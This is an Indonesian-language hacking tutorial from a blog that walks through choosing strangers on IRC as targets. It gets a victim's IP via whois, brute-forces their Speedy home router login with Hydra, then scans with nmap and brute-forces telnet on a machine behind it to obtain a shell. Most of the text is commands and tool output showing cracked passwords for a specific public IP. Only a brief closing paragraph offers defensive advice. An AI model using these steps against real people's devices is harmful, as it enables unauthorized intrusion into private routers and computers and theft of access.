Apakah anda suka cari target di IRC untuk dihack router speedy atau
di PC dibelakang router untuk pentest? Apakah anda masih mengandalkan
target yang mengandalkan router speedy dengan keamanan password default
yaitu user admin dan password admin ? Kalau anda masih mengandalkan
metode serangan password default, maka disini penulis akan memberikan
metode tambahan untuk anda yaitu metode brute force.
Disini penulis menggunakan tool Hydra. Hydra adalah tool untuk
melakukan hacking password dengan menggunakan metode brute force, dengan
anda memiliki kamus kata yang banyak yang dimungkinkan passwordnya ada
di dalam kamus tersebut.
Di sini penulis contohkan misal kita join ke mIRC, kita contohkan
saja nick ce_imutbgtt, nah whois aja itu nick dan kita akan mendapatkan
IPnya.
Tampilan IP setelah di whois.
Setelah kita dapatkan IPnya maka jalankan saja di browser IP address tersebut.
Setelah dijalankan http://180.254.70.135 maka akan tampil form window seperti dibawah ini
Jika menggunakan username admin dan password admin hasilnya adalah
gagal maka anda akan dihadapkan pada 2 hal, terus maju atau tinggalkan
target.
Jika anda ingin terus maju maka anda dapat menggunakan teknik brute
force. Contohnya untuk melakukan exploitasi dengan hydra adalah
H:\hydra>hydra -m / -l admin -P data.txt 180.254.70.135 http-get
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-17 14:27:56
[DATA] 11 tasks, 1 servers, 11 login tries (l:1/p:11), ~1 tries per task
[DATA] attacking service http-get on port 80
[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)
[80][www] host: 180.254.70.135 login: admin password: baseball
Hydra (http://www.thc.org) finished at 2011-10-17 14:27:57
H:\hydra>
Setelah kita masuk ke router dengan password yang didapat, jika kita
ingin melakukan hacking server di belakang router maka kita dapat
melakukan IP Forwarding dari router ke Server yang berada dibelakang
router.
Disini kita tidak tahu IP-IP lokal berapa saja dibelakang router,
karena itu kita dapat mengujinya satu persatu dengan melakukan ping
walaupun tidak jaminan.
Disini diasumsikan IP Servernya adalah 192.168.1.2 setelah kita ping dapat.
D:\>ping 180.254.70.135
Pinging 180.254.70.135 with 32 bytes of data:
Reply from 180.254.70.135: bytes=32 time<1ms TTL=254
Reply from 180.254.70.135: bytes=32 time=2ms TTL=254
Reply from 180.254.70.135: bytes=32 time=11ms TTL=254
Reply from 180.254.70.135: bytes=32 time<1ms TTL=254
Setelah diping jalan maka kita dapat mencoba melakukan scanning dengan NMAP
C:\>nmap -v -A 180.254.70.135
Starting Nmap 5.21 ( http://nmap.org ) at 2011-10-17 15:28 Pacific Daylight Time
NSE: Loaded 36 scripts for scanning.
Initiating Ping Scan at 15:28
Scanning 180.254.70.135 [4 ports]
Completed Ping Scan at 15:28, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 3.09s elapsed
Initiating SYN Stealth Scan at 15:28
Scanning 180.254.70.135 [1000 ports]
Discovered open port 23/tcp on 180.254.70.135
Discovered open port 80/tcp on 180.254.70.135
Discovered open port 3389/tcp on 180.254.70.135
Discovered open port 21/tcp on 180.254.70.135
Completed SYN Stealth Scan at 15:28, 2.34s elapsed (1000 total ports)
Disini dari scanning dengan NMAP kita mendapatkan adanya port 23
yaitu port untuk telnet server. Dengan aktifnya Telnet Server maka kita
dapat melakukan brute force ke server Telnet dengan Hydra.
H:\hydra>hydra -l administrator -P data.txt 180.254.70.135 telnet
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-17 15:21:22
[DATA] 6 tasks, 1 servers, 6 login tries (l:1/p:6), ~1 tries per task
[DATA] attacking service telnet on port 23
[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)
[23][telnet] host: 180.254.70.135 login: administrator password: sepakbola
Hydra (http://www.thc.org) finished at 2011-10-17 15:21:26
Binggo, kita mendapatkan password telnetnya.
Masukkan login dan passwordnya dan kita akan mendapatkan shell dari telnet server. Contohnya :
Setelah kita klik Open. Masukkan login dan passwordnya.
Binggo, kita masuk ke shell server.
Untuk cari kamusnya untuk brute force dapat dicari sendiri di google,
jika ingin buat sendiri juga boleh. Cayooo!
Pengamanannya jika anda ingin tetap dapat dipanggil router speedynya
dari luar, maka anda dapat membuat password yang susah ditebak dengan
berbagai kombinasi huruf dan angka yang kompleks tapi tetap mudah
diingat. Jika ingin lebih aman lagi ya tidak perlu membuat router speedy
bisa diakses dari internet, caranya misal dengan melempar port 80 ke IP
lain yang kosong atau tidak dipakai.
Thanks for reading & sharing Kujak Online Indonesia